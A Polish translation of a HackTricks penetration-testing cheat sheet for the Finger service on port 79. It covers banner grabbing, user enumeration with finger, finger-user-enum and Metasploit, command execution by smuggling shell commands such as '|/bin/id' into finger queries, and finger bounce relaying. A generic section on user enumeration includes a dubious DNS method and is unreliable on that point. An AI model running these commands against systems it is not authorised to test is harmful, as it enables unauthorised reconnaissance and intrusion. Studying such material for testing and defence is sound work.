6.7 KiB
79 - Testowanie penetracyjne Finger
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Podstawowe informacje
Program/usługa Finger służy do pobierania informacji o użytkownikach komputera. Zazwyczaj dostarczane informacje obejmują nazwę użytkownika, pełne imię i w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe szczegóły mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas logowania użytkownika, okres bezczynności (czas bezczynności), ostatnią chwilę odczytu poczty przez użytkownika oraz zawartość plików planu i projektu użytkownika.
Domyślny port: 79
PORT STATE SERVICE
79/tcp open finger
Egzaminacja
Pobieranie baneru/Podstawowe połączenie
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Wyszukiwanie użytkowników
Wyszukiwanie użytkowników to proces identyfikowania i zbierania informacji o użytkownikach w celu uzyskania dostępu do systemu. Poniżej przedstawiam kilka technik, które można wykorzystać do przeprowadzenia takiego procesu.
1. Finger
Finger to protokół, który umożliwia uzyskanie informacji o użytkownikach z serwera. Można go wykorzystać do wyszukiwania użytkowników na zdalnym systemie. Aby użyć protokołu Finger, wystarczy wysłać zapytanie do serwera, podając nazwę użytkownika. Serwer odpowie, udostępniając informacje o użytkowniku, takie jak nazwa, opis, adres e-mail itp.
Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu Finger, można użyć narzędzi takich jak finger
lub finger-user-enum
. Przykład użycia narzędzia finger-user-enum
:
finger-user-enum.pl -U /path/to/usernames.txt -t <target>
Gdzie /path/to/usernames.txt
to ścieżka do pliku zawierającego listę nazw użytkowników, a <target>
to adres IP lub nazwa domenowa zdalnego systemu.
2. LDAP
LDAP (Lightweight Directory Access Protocol) to protokół używany do zarządzania i dostępu do katalogów. Można go wykorzystać do wyszukiwania użytkowników w katalogach LDAP. Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu LDAP, można użyć narzędzi takich jak ldapsearch
. Przykład użycia narzędzia ldapsearch
:
ldapsearch -x -h <target> -b "dc=<domain>,dc=<com>" "(objectClass=user)"
Gdzie <target>
to adres IP lub nazwa domenowa serwera LDAP, a <domain>
i <com>
to odpowiednie wartości domeny.
3. DNS
DNS (Domain Name System) to system, który przypisuje nazwy domenowe do adresów IP. Można wykorzystać DNS do wyszukiwania użytkowników, sprawdzając, czy istnieją rekordy DNS dla określonych nazw użytkowników. Aby przeprowadzić wyszukiwanie użytkowników za pomocą DNS, można użyć narzędzi takich jak dnsenum
. Przykład użycia narzędzia dnsenum
:
dnsenum --enum -f /path/to/usernames.txt <target>
Gdzie /path/to/usernames.txt
to ścieżka do pliku zawierającego listę nazw użytkowników, a <target>
to adres IP lub nazwa domenowa systemu.
4. Social Engineering
Inżynieria społeczna to technika polegająca na manipulowaniu ludźmi w celu uzyskania poufnych informacji. Można wykorzystać inżynierię społeczną do uzyskania informacji o użytkownikach, takich jak nazwy użytkowników, adresy e-mail, numery telefonów itp. Przykłady technik inżynierii społecznej to phishing, pretexting, tailgating itp.
Wyszukiwanie użytkowników jest ważnym krokiem w procesie penetrowania systemów. Dzięki odpowiednim narzędziom i technikom można zidentyfikować użytkowników i wykorzystać te informacje do dalszych działań.
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternatywnie można użyć finger-user-enum z pentestmonkey, kilka przykładów:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap wykonuje skrypt do wykonania za pomocą domyślnych skryptów
Metasploit używa więcej trików niż Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Wykonanie polecenia
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Wykorzystaj system jako przekaźnik dla finger
finger user@host@victim
finger @internal@external
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.